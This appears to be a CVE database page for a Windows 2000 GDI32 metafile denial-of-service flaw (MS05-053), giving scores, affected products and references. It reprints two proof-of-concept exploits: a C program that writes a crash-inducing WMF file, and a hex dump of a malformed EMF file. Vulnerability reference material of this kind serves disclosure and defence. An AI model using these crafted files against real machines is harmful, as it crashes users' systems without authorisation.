Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
The GetEnhMetaFilePaletteEntries API in GDI32.DLL in Windows 2000 allows remote attackers to cause a denial of service (application crash) via a crafted Enhanced Metafile (EMF) file that causes invalid (1) end, (2) emreof, or (3) palent offsets to be used, aka "Enhanced Metafile Vulnerability."
CVE Informations
Related Weaknesses
| Weakness Name | Source | |
|---|---|---|
| Category : Resource Management Errors Weaknesses in this category are related to improper management of system resources. |
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 5 | AV:N/AC:L/Au:N/C:N/I:N/A:P | nvd@nist.gov |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 1346
Publication date : 2005-11-29 23h00 +00:00
Author : Winny Thomas
EDB Verified : Yes
/*
* Author: Winny Thomas
* Pune, INDIA
*
* The crafted metafile (WMF) from this code when viewed in explorer crashes it. The issue is seen
* when the field 'mtNoObjects' in the Metafile header is set to 0x0000.
* The code was tested on Windows 2000 server SP4. The issue does not occur with the
* hotfix for GDI (MS05-053) installed.
*
* Disclaimer: This code is for educational/testing purposes by authorized persons on
* networks/systems setup for such a purpose. The author of this code shall not bear
* any responsibility for any damage caused by using this code.
*
*/
#include <stdio.h>
unsigned char wmfheader[] =
"\xd7\xcd\xc6\x9a\x00\x00\xc6\xfb\xca\x02\xaa\x02\x39\x09\xe8\x03"
"\x00\x00\x00\x00\x66\xa6"
"\x01\x00" //mtType
"\x09\x00" //mtHeaderSize
"\x00\x03" //mtVersion
"\xff\xff\xff\x7f" //mtSize
"\x00\x00" //mtNoObjects
"\xff\xff\xff\xff" //mtMaxRecord
"\x00\x00";
unsigned char metafileRECORD[] =
"\x05\x00\x00\x00\x0b\x02\x39\x09\xc6\xfb\x05\x00\x00\x00\x0c\x02"
"\x91\xf9\xe4\x06\x04\x00\x00\x00\x06\x01\x01\x00\x07\x00\x00\x00"
"\xfc\x02\x00\x00\x0e\x0d\x0d\x00\x00\x00\x04\x00\x00\x00\x2d\x01"
"\x00\x00\x08\x00\x00\x00\xfa\x02"
"\x05\x00\x00\x00\x00\x00\xff\xff\xff\x00\x04\x00\x00\x00\x2d\x01"
"\x01\x00\x04\x00\x00\x00\x06\x01\x01\x00\x14\x00\x00\x00\x24\x03"
"\x08\x00\xc6\xfb\xca\x02\xbc\xfe\xca\x02\x0f\x01\x49\x06\xa5\x02"
"\x49\x06\xf4\x00\x68\x08\xd5\xfc\x65\x06\x86\xfe\x65\x06\xc6\xfb"
"\xca\x02\x08\x00\x00\x00\xfa\x02\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x04\x00\x00\x00\x2d\x01\x02\x00\x07\x00\x00\x00\xfc\x02"
"\x00\x00\xff\xff\xff\x00\x00\x00\x04\x00\x00\x00\x2d\x01\x03\x00"
"\x04\x00\x00\x00\xf0\x01\x00\x00\x07\x00\x00\x00\xfc\x02\x00\x00"
"\xbd\x34\x30\x00\x00\x00\x04\x00\x00\x00\x2d\x01\x00\x00\x04\x00"
"\x00\x00\x2d\x01\x01\x00\x04\x00\x00\x00\x06\x01\x01\x00\x0e\x00"
"\x00\x00\x24\x03\x05\x00\xd5\xfc\x36\x07\xda\xfc\xd1\x06\x8b\xfe"
"\xd1\x06\x86\xfe\x36\x07\xd5\xfc\x36\x07\x04\x00\x00\x00\x2d\x01"
"\x02\x00\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00\x00\x00\xf0\x01"
"\x00\x00\x07\x00\x00\x00\xfc\x02\x00\x00\xbd\x34\x30\x00\x00\x00"
"\x04\x00\x00\x00\x2d\x01\x00\x00\x04\x00\x00\x00\x2d\x01\x01\x00"
"\x04\x00\x00\x00\x06\x01\x01\x00\x0e\x00\x00\x00\x24\x03\x05\x00"
"\xc6\xfb\x9b\x03\xcb\xfb\x36\x03\xc1\xfe\x36\x03\xbc\xfe\x9b\x03"
"\xc6\xfb\x9b\x03\x04\x00\x00\x00\x2d\x01\x02\x00\x04\x00\x00\x00"
"\x2d\x01\x03\x00\x04\x00\x00\x00\xf0\x01\x00\x00\x07\x00\x00\x00"
"\xfc\x02\x00\x00\xfb\x4e\x55\x00\x00\x00\x04\x00\x00\x00\x2d\x01"
"\x00\x00\x04\x00\x00\x00\x2d\x01\x01\x00\x04\x00\x00\x00\x06\x01"
"\x01\x00\x0e\x00\x00\x00\x24\x03\x05\x00\xbc\xfe\x9b\x03\xc1\xfe"
"\x36\x03\x14\x01\xb5\x06\x0f\x01\x1a\x07\xbc\xfe\x9b\x03\x04\x00"
"\x00\x00\x2d\x01\x02\x00\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00"
"\x00\x00\xf0\x01\x00\x00\x07\x00\x00\x00\xfc\x02\x00\x00\xbd\x34"
"\x30\x00\x00\x00\x04\x00\x00\x00\x2d\x01\x00\x00\x04\x00\x00\x00"
"\x2d\x01\x01\x00\x04\x00\x00\x00\x06\x01\x01\x00\x0e\x00\x00\x00"
"\x24\x03\x05\x00\x0f\x01\x1a\x07\x14\x01\xb5\x06\xaa\x02\xb5\x06"
"\xa5\x02\x1a\x07\x0f\x01\x1a\x07\x04\x00\x00\x00\x2d\x01\x02\x00"
"\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00\x00\x00\xf0\x01\x00\x00"
"\x07\x00\x00\x00\xfc\x02\x00\x00\xfa\x94\x93\x00\x00\x00\x04\x00"
"\x00\x00\x2d\x01\x00\x00\x04\x00\x00\x00\x2d\x01\x01\x00\x04\x00"
"\x00\x00\x06\x01\x01\x00\x14\x00\x00\x00\x24\x03\x08\x00\xc6\xfb"
"\x9b\x03\xbc\xfe\x9b\x03\x0f\x01\x1a\x07\xa5\x02\x1a\x07\xf4\x00"
"\x39\x09\xd5\xfc\x36\x07\x86\xfe\x36\x07\xc6\xfb\x9b\x03\x04\x00"
"\x00\x00\x2d\x01\x02\x00\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00"
"\x00\x00\xf0\x01\x00\x00\x03\x00";
unsigned char wmfeof[] =
"\x00\x00\x00\x00";
int main(int argc, char *argv[])
{
FILE *fp;
int metafilesizeW, recordsizeW;
char wmfbuf[2048];
int metafilesize, recordsize, i, j;
metafilesize = sizeof (wmfheader) + sizeof (metafileRECORD) + sizeof(wmfeof) -3;
metafilesizeW = metafilesize/2;
recordsize = sizeof (metafileRECORD) -1;
recordsizeW = recordsize/2;
memcpy((unsigned long *)&wmfheader[28], &metafilesize, 4);
memcpy((unsigned long *)&wmfheader[34], &recordsizeW, 4);
printf("[*] Adding Metafile header\n");
for (i = 0; i < sizeof(wmfheader) -1; i++) {
(unsigned char)wmfbuf[i] = (unsigned char)wmfheader[i];
}
printf("[*] Adding metafile records\n");
for (j = i, i = 0; i < sizeof(metafileRECORD) -1; i++, j++) {
wmfbuf[j] = metafileRECORD[i];
}
printf("[*] Setting EOF\n");
for (i = 0; i < sizeof(wmfeof) -1; i++, j++) {
wmfbuf[j] = wmfeof[i];
}
printf("[*] Creating Metafile (MS053.wmf)\n");
fp = fopen("MS053.wmf", "wb");
fwrite(wmfbuf, 1, metafilesize, fp);
fclose(fp);
}
// milw0rm.com [2005-11-30]
Exploit Database EDB-ID : 25231
Publication date : 2005-03-16 23h00 +00:00
Author : Hongzhen Zhou
EDB Verified : Yes
source: https://www.securityfocus.com/bid/12834/info
Reportedly, a denial of service vulnerability affects Microsoft Windows GDI library 'gdi32.dll'. This issue is due to a failure of the application to securely copy data from malformed EMF image files.
An attacker may leverage this issue to trigger a denial of service condition in software implementing the vulnerable library. Other attacks may also be possible.
A hex dumped EMF file:
-------------------------------------------------------
0000000 01 00 00 00 64 00 00 00 93 00 00 00 02 00 00 00
0000010 83 01 00 00 39 01 00 00 00 00 00 00 00 00 00 00
0000020 d1 08 00 00 be 06 00 00 20 45 4d 46 00 00 01 00
0000030 78 00 00 00 17 00 00 00 03 00 00 00 0f 00 00 00
0000040 64 00 00 00 41 00 00 00 c8 12 00 00 c2 1a 00 00
0000050 cc 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00
0000060 00 00 00 00 0e 00 00 00 14 00 00 00 41 00 00 00
0000070 41 42 43 44 00 00 01 ff
-------------------------------------------------------
Products Mentioned
Configuraton 0
Microsoft>>Windows_2000 >> Version *
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version beta3 (Open CPE detail)
Microsoft>>Windows_2000 >> Version *
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
Microsoft>>Windows_2000 >> Version *
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
Microsoft>>Windows_2000 >> Version *
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
Microsoft>>Windows_2000 >> Version *
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
- Microsoft>>Windows_2000 >> Version - (Open CPE detail)
References
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1152
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1240
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2005/ms05-053
Tags : vendor-advisory, x_refsource_MS
Tags : vendor-advisory, x_refsource_MS
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1121
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A1215
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A671
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
The information presented on CVE Find originates from several carefully selected reference sources. CVE data is provided by MITRE Corporation and the National Vulnerability Database (NVD). The Known Exploited Vulnerabilities (KEV) catalog is sourced from the Cybersecurity and Infrastructure Security Agency (CISA), while EPSS scores come from FIRST.org. Additionally, data regarding software weaknesses (CWE) and common attack patterns (CAPEC) is maintained by MITRE Corporation, and information on hardware and software configurations (CPE) is provided by the NVD.